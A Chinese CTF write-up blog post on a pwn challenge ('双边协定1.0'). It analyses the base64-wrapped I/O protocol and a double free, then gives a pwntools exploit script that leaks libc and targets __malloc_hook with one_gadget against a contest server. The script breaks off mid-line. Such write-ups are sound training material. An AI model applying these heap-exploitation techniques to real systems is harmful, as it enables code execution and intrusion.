<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-Hans">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">









<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="pwn," />





  <link rel="alternate" href="/atom.xml" title="R1nd0's Blog" type="application/atom+xml" />






<meta name="description" content="连打两天，逆向花了不少时间，人都快调傻了">
<meta property="og:type" content="article">
<meta property="og:title" content="红明谷ctf_虎符ctf">
<meta property="og:url" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/index.html">
<meta property="og:site_name" content="R1nd0&#39;s Blog">
<meta property="og:description" content="连打两天，逆向花了不少时间，人都快调傻了">
<meta property="og:locale">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193211643.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193819583.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193647943.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193936567.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404194205046.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404195209710.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404195717687.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404195757560.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404201528534.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404201332464.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203118549.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203354935.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203414530.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203435064.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203820088.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203832082.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203857068.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404203925710.png">
<meta property="og:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404204235685.png">
<meta property="article:published_time" content="2021-04-04T11:25:30.000Z">
<meta property="article:modified_time" content="2021-04-04T13:21:37.755Z">
<meta property="article:author" content="R1nd0">
<meta property="article:tag" content="pwn">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193211643.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"always","offset":12,"b2t":false,"scrollpercent":true,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: '博主'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="http://example.com/2021/04/04/红明谷ctf-虎符ctf/"/>





  <title>红明谷ctf_虎符ctf | R1nd0's Blog</title>
  








<meta name="generator" content="Hexo 5.4.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-Hans">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">R1nd0's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle"></p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-home">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-about">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于
          </a>
        </li>
      
        
        <li class="menu-item menu-item-tags">
          <a href="/tags/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />
            
            标签
          </a>
        </li>
      
        
        <li class="menu-item menu-item-categories">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-archives">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-question-circle"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="http://example.com/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/header.jpg">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="R1nd0's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">红明谷ctf_虎符ctf</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">发表于</span>
              
              <time title="创建于" itemprop="dateCreated datePublished" datetime="2021-04-04T19:25:30+08:00">
                2021-04-04
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">分类于</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/ctf/" itemprop="url" rel="index">
                    <span itemprop="name">ctf</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/#comments" itemprop="discussionUrl">
                  <span class="post-comments-count valine-comment-count" data-xid="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          

          

          
            <span class="post-meta-divider">|</span>
            <span id="busuanzi_value_page_pv"></span>次阅读
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>连打两天，逆向花了不少时间，人都快调傻了</p>
<span id="more"></span>

<h1 id="红明谷—双边协定1-0"><a href="#红明谷—双边协定1-0" class="headerlink" title="红明谷—双边协定1.0"></a>红明谷—双边协定1.0</h1><h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><h3 id="输出"><a href="#输出" class="headerlink" title="输出"></a>输出</h3><p>这个程序对输入输出都是有动手脚的，首先输出数据是加密过的，看看加密函数</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193211643.png" class="">

<p>大概就是会在需要输出的信息前再加上一串东西，然后base64加密，也就是说将收到的数据base64揭秘之后，末尾才是你真正需要的，可以验证一下这一点：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193819583.png" class="">

<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193647943.png" class="">

<h3 id="输入"><a href="#输入" class="headerlink" title="输入"></a>输入</h3><p>其次来看输入</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404193936567.png" class="">

<p>可以很容易看出decrypt函数就是处理我们输入的一个关键函数了：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404194205046.png" class="">

<p>不难看出是个base64解密，也就是说我们在输入的时候，需要将数据base64编码之后再发过去</p>
<p>接下来就是输入数据的格式了，分析之后得：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x1234567812345678</span></span><br><span class="line"></span><br><span class="line">chunk1_size+chunk2(ptr)_size+<span class="number">0x20</span></span><br><span class="line"></span><br><span class="line">chunk1_size</span><br><span class="line"></span><br><span class="line">chunk2(ptr)_size</span><br><span class="line"></span><br><span class="line">chunk1_data（前八字节必须为<span class="number">0x4141414141414141</span>）</span><br><span class="line"></span><br><span class="line">chunk2(ptr)_data</span><br></pre></td></tr></table></figure>

<p>当输入成功后返回chunk2(ptr)的指针，也就是说需要将你的有效输入数据放在chunk2_data里面</p>
<h2 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h2><p>首先泄露地址，这一点并不难</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404195209710.png" class="">

<p>虽说add这里可以申请的chunk大小有限，但是在输入时用到的那两个chunk的size可以开到很大，切割unsorted bin泄露地址就行</p>
<p>其次就是漏洞点：</p>
<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404195717687.png" class="">

<img src="/2021/04/04/%E7%BA%A2%E6%98%8E%E8%B0%B7ctf-%E8%99%8E%E7%AC%A6ctf/image-20210404195757560.png" class="">

<p>倘若在add时输入content的时候使之返回ERROR，程序并不会结束，里面会free一次ptr，外面也会free一次，这样一来就构成了一个double free，正常写malloc_hook就行了</p>
<p>脚本的话老习惯了，懒得写函数，看着乱哈哈</p>
<p>不过这题的难点在分析，漏洞利用还是比较简单的，最后写完hook就可以直接interactive()了，因为menu输出数据时也是会申请chunk的</p>
<p>exp：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">context.arch=<span class="string">&#x27;amd64&#x27;</span></span><br><span class="line">local=<span class="number">1</span></span><br><span class="line"><span class="keyword">if</span> local:</span><br><span class="line">	sh=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">	libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line"><span class="keyword">else</span>:</span><br><span class="line">    sh=remote(<span class="string">&quot;8.140.179.11&quot;</span>,<span class="number">13452</span>)</span><br><span class="line">    libc=ELF(<span class="string">&#x27;/lib/x86_64-linux-gnu/libc.so.6&#x27;</span>)</span><br><span class="line">one_gadget=[<span class="number">0x45226</span>,<span class="number">0x4527a</span>,<span class="number">0xf0364</span>,<span class="number">0xf1207</span>]</span><br><span class="line">sa = <span class="keyword">lambda</span> s,n : sh.sendafter(s,n)</span><br><span class="line">sla = <span class="keyword">lambda</span> s,n : sh.sendlineafter(s,n)</span><br><span class="line">sl = <span class="keyword">lambda</span> s : sh.sendline(s)</span><br><span class="line">sd = <span class="keyword">lambda</span> s : sh.send(s)</span><br><span class="line">rc = <span class="keyword">lambda</span> n : sh.recv(n)</span><br><span class="line">ru = <span class="keyword">lambda</span> s : sh.recvuntil(s)</span><br><span class="line">ti = <span class="keyword">lambda</span> : sh.interactive()</span><br><span class="line">leak = <span class="keyword">lambda</span> name,addr :log.success(name+<span class="string">&quot;:&quot;</span>+<span class="built_in">hex</span>(addr))</span><br><span class="line"></span><br><span class="line">sleep(<span class="number">1</span>)</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x31&quot;</span></span><br><span class="line"><span class="comment">#choice add</span></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x38&quot;</span></span><br><span class="line"><span class="comment">#size=0x8</span></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;aaaaaaaa&quot;</span></span><br><span class="line"><span class="comment">#content=&quot;aaaaaaaa&quot;</span></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x34&quot;</span></span><br><span class="line"><span class="comment">#choice show</span></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;\n&quot;</span>)</span><br><span class="line">data=ru(<span class="string">&quot;\n&quot;</span>)[:-<span class="number">1</span>]</span><br><span class="line">data=base64.b64decode(data)</span><br><span class="line"><span class="built_in">print</span> data</span><br><span class="line">addr=u64(data[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">&quot;\x00&quot;</span>))</span><br><span class="line">leak(<span class="string">&quot;addr&quot;</span>,addr)</span><br><span class="line">libc_base=addr-<span class="number">0x58</span>-<span class="number">0x3c4b20</span>+<span class="number">0x10000000000</span></span><br><span class="line">leak(<span class="string">&quot;libc_base&quot;</span>,libc_base)</span><br><span class="line">malloc_hook=libc_base+libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">one=libc_base+one_gadget[<span class="number">1</span>]</span><br><span class="line">realloc=libc_base+libc.sym[<span class="string">&#x27;realloc&#x27;</span>]</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x31&quot;</span></span><br><span class="line"><span class="comment">#choice add</span></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x00\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x20\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x38&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIvAAAAAAAAAAgAAAAAAAAABwAAAAAAAABBQUFBQUFBQVNpemUgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x40\x01\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">32</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;aaaaaaaa&quot;</span></span><br><span class="line"><span class="comment">#Illegal head cause double free</span></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIyAAAAAAAAAAgAAAAAAAAACgAAAAAAAABBQUFBQUFBQUNvbnRlbnQgPj4=&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x60\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x30\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x10\x00\x00\x00\x00\x00\x00\x00&quot;</span></span><br><span class="line">s+=<span class="string">&quot;\x41\x41\x41\x41\x41\x41\x41\x41&quot;</span>*<span class="number">6</span></span><br><span class="line"></span><br><span class="line">s+=<span class="string">&quot;\x31&quot;</span></span><br><span class="line"></span><br><span class="line">ru(<span class="string">&quot;eFY0EnhWNBIxAAAAAAAAAAgAAAAAAAAACQAAAAAAAABBQUFBQUFBQUNob2ljZSA/Pg==&quot;</span>)</span><br><span class="line">sl(base64.b64encode(s))</span><br><span class="line"></span><br><span class="line">s=<span class="string">&quot;\x78\x56\x34\x12\x78\x56\x34\x12&quot;</span></span><br><span 